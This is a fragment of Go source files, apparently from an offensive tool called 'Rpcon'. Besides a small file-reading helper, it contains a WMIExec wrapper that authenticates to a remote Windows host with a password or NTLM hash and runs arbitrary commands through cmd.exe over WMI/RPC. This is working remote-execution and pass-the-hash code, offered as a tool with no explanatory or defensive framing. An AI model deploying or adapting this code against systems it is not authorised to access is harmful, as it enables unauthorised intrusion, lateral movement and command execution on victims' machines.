| import ( 4 | "fmt" 5 | "io/ioutil" 6 | "log" 7 | ) 8 | 9 | func Readfile(filename string) (string, error) { 10 | s := "" 11 | file, err := ioutil.ReadFile(filename) 12 | if err != nil { 13 | log.Println("打开文件失败") 14 | } 15 | s = fmt.Sprintf("%s", file) 16 | return s, err 17 | } 18 | -------------------------------------------------------------------------------- /pkg/wmiexec.go: -------------------------------------------------------------------------------- 1 | package pkg 2 | 3 | import ( 4 | "Rpcon/common" 5 | "errors" 6 | "fmt" 7 | "github.com/C-Sto/goWMIExec/pkg/wmiexec" 8 | ) 9 | 10 | var ClientHost string 11 | 12 | func Wmiexec() (flag bool, err error) { 13 | target := fmt.Sprintf("%s:%v", common.Host, common.Port) 14 | return WMIExec(target, common.User, common.Password, common.Hash, common.Domain, common.Code, ClientHost, "", nil) 15 | } 16 | 17 | func WMIExec(target, username, password, hash, domain, command, clientHostname, binding string, cfgIn *wmiexec.WmiExecConfig) (flag bool, err error) { 18 | if cfgIn == nil { 19 | cfg, err1 := wmiexec.NewExecConfig(username, password, hash, domain, target, clientHostname, true, nil, nil) 20 | if err1 != nil { 21 | err = err1 22 | return 23 | } 24 | cfgIn = &cfg 25 | } 26 | execer := wmiexec.NewExecer(cfgIn) 27 | err = execer.SetTargetBinding(binding) 28 | if err != nil { 29 | return 30 | } 31 | 32 | err = execer.Auth() 33 | if err != nil { 34 | return 35 | } 36 | flag = true 37 | 38 | if command != "" { 39 | command = "C:\\Windows\\system32\\cmd.exe /c " + command 40 | if execer.TargetRPCPort == 0 { 41 | err = errors.New("RPC Port is 0, cannot connect") 42 | return 43 | } 44 | 45 | err = execer.RPCConnect() 46 | if err != nil { 47 | return 48 | } 49 | err = execer.Exec(command) 50 | if err != nil { 51 | return 52 | } 53 | } 54 | return 55 | } 56 | --------------------------------------------------------------------------------